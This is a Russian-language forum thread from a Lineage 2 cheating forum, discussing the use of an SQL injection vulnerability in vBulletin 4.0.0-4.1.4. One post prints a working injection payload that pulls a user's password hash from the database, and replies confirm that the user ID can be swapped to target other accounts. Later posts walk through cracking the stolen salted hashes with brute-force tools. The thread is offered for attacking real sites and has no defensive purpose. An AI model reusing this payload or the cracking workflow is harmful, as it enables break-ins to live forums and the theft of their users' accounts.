 |
Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4 - Общение и обсуждение, архив Lineage 2 - Cобытия, информация, вопросы и ответы по Lineage 2 |
26.09.2011, 10:24
|
#1
|
|
|
|
Рыцарь
|
 Регистрация: 19.02.2010
 Сообщений: 340
 Популярность: 9058
 Сказал(а) спасибо: 301
Поблагодарили 696 раз(а) в 278 сообщениях
|
Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4
|
|
|
26.09.2011, 11:07
|
#2
|
|
|
|
Разведчик
|
 Регистрация: 12.12.2009
 Сообщений: 24
 Популярность: 149
 Сказал(а) спасибо: 143
Поблагодарили 19 раз(а) в 9 сообщениях
|
Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
то что выделенно красным можно поменять на id другого юзера?
и еще такой вопрос,что если стоит антиспам бот к примеру такой (Проверка вопроса системы антиспама "NoSpam!")
s=&securitytoken=guest&do=process&searchthreadid=& query=32erddd&titleonly=0&searchuser=&starteronly= 0&exactname=1&humanverify%5Binput%5D=ktag2s&humanv erify%5Bhash%5D=7ee31ad89911458254ed1d2db6a21588&nospamnumber=0&nospam=********.net&replyless=0&replylimit=0&searchdate=0&beforeafter =after&sortby=lastpost&order=descending&showposts= 0&tag=&forumchoice%5B%5D=0&childforums=1&dosearch= %CD%E0%F7%E0%F2%FC+%EF%EE%E8%F1%EA
________________
skype sunches123666
Последний раз редактировалось sunches; 26.09.2011 в 11:10.
|
|
|
26.09.2011, 11:24
|
#3
|
|
|
|
Капитан
|
 Регистрация: 07.04.2010
 Сообщений: 293
 Популярность: 4393
 Сказал(а) спасибо: 133
Поблагодарили 334 раз(а) в 187 сообщениях
|
Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4
ID можно менять
для запроса нужен только securitytoken вроде бы
________________
ICQ - 78055223
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
|
|
|
Пользователь сказал cпасибо:
|
|
27.09.2011, 17:05
|
#4
|
|
|
|
Разведчик
|
 Регистрация: 18.05.2011
 Сообщений: 2
 Популярность: 10
 Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
|
Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4
А где тип хеша md5(md5($pass)$salt) расшифровать? Подскажите.
|
|
|
27.09.2011, 17:13
|
#5
|
|
|
|
Разведчик
|
 Регистрация: 18.03.2010
 Сообщений: 6
 Популярность: 399
 Сказал(а) спасибо: 1
Поблагодарили 188 раз(а) в 103 сообщениях
|
Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4
 |
Цитата: |
 |
|
|
|
|
|
|
|
|
А где тип хеша md5(md5($pass)$salt) расшифровать? Подскажите.
|
|
 |
|
 |
|
в програме PasswordsPro или Extreme GPU Bruteforcer
2 вопроса
как узнать логин юзера 1 ? ведь логин и никнейм не одно и тоже
в соли присудствует такое
<
&
"
>
прочитал в инете
одни пишут что нужно удалить lt; amp; quot; gt;
другие пишут что нужно заменить их на символы какими они и являются & - &, " - "
так как делать правильно ?
Последний раз редактировалось SyavaK; 27.09.2011 в 17:17.
|
|
|
27.09.2011, 17:42
|
#6
|
|
|
|
Разведчик
|
 Регистрация: 18.05.2011
 Сообщений: 2
 Популярность: 10
 Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
|
Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4
" это двойная ковычка вроде. Я думаю не стоит удалять, проще заменить.
|
|
|
27.09.2011, 17:46
|
#7
|
|
|
|
Капитан
|
 Регистрация: 07.04.2010
 Сообщений: 293
 Популярность: 4393
 Сказал(а) спасибо: 133
Поблагодарили 334 раз(а) в 187 сообщениях
|
Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4
я удалял, потому что иначе соль больше 30 символов
Логин и никнейм в булке одно и тоже... вроде бы 
это в ИПБ вроде логин и ник разные
________________
ICQ - 78055223
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
|
|
|
27.09.2011, 18:05
|
#8
|
|
|
|
Разведчик
|
 Регистрация: 18.03.2010
 Сообщений: 6
 Популярность: 399
 Сказал(а) спасибо: 1
Поблагодарили 188 раз(а) в 103 сообщениях
|
Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4
|
|
|
27.09.2011, 18:33
|
#9
|
|
|
|
Разведчик
|
 Регистрация: 18.05.2011
 Сообщений: 2
 Популярность: 10
 Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
|
Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4
Ребят, еще вопрос, сколько по времени Passwords Pro расшифровывает это дело? У меня показывает что около двух дней будет копать....
|
|
|
27.09.2011, 19:59
|
#10
|
|
|
|
Разведчик
|
 Регистрация: 18.03.2010
 Сообщений: 6
 Популярность: 399
 Сказал(а) спасибо: 1
Поблагодарили 188 раз(а) в 103 сообщениях
|
Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4
 |
Цитата: |
 |
|
|
|
|
|
|
|
|
Ребят, еще вопрос, сколько по времени Passwords Pro расшифровывает это дело? У меня показывает что около двух дней будет копать....
|
|
 |
|
 |
|
зависит от способа дешифровки, словари , брут и тд и ещё от длины пароля
может занять и месяцы )
ещё вопрос в соли попадается знак двоеточие это норм ?
ато пасвордпро его не щитает за часть соли а за разделитель
|
|
|
27.09.2011, 20:42
|
#11
|
|
|
|
Разведчик
|
 Регистрация: 18.05.2011
 Сообщений: 2
 Популярность: 10
 Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
|
Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4
Можете кто нить дать нормальный словарь, а то я смотрю многие очень быстро расшифровывают кучу паролей сольных.
|
|
|
27.09.2011, 21:26
|
#12
|
|
|
|
Разведчик
|
 Регистрация: 18.03.2010
 Сообщений: 6
 Популярность: 399
 Сказал(а) спасибо: 1
Поблагодарили 188 раз(а) в 103 сообщениях
|
Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4
|
|
|
28.09.2011, 00:22
|
#13
|
|
|
|
Капитан
|
 Регистрация: 07.04.2010
 Сообщений: 293
 Популярность: 4393
 Сказал(а) спасибо: 133
Поблагодарили 334 раз(а) в 187 сообщениях
|
Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4
не знаю даже
может и на русском логин)
да расшифровывал после убирания amp; итд
чтобы не показывало : как разделитель
загружай из буфера в виде акк:хеш:соль и все
________________
ICQ - 78055223
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
|
|
|
28.09.2011, 01:19
|
#14
|
|
|
|
Разведчик
|
 Регистрация: 18.03.2010
 Сообщений: 6
 Популярность: 399
 Сказал(а) спасибо: 1
Поблагодарили 188 раз(а) в 103 сообщениях
|
Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4
|
|
|
28.09.2011, 08:40
|
#15
|
|
|
|
Разведчик
|
 Регистрация: 26.10.2009
 Сообщений: 25
 Популярность: 336
 Сказал(а) спасибо: 10
Поблагодарили 12 раз(а) в 5 сообщениях
|
Re: Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4
|
|
|
Ваши права в разделе
|
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
HTML код Выкл.
|
|
|
Похожие темы
|
Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
[Уязвимость] vBulletin 4.0.0-4.1.4
|
Excellent18rus |
Базы серверов и брут |
0 |
25.09.2011 19:08 |
помогите с vbulletin
|
FunFtp |
Школа Читера |
3 |
06.08.2011 11:58 |
[Уязвимость] vbulletin 3.8.6
|
-=Angel=- |
Базы серверов и брут |
10 |
28.03.2011 15:32 |
[Помогите!] VBulletin
|
lawliet94 |
Вопросы и ответы, обсуждения |
6 |
03.08.2010 16:49 |
Заявление об ответственности / Список мошенников
Часовой пояс GMT +4, время: 17:50.
|
 |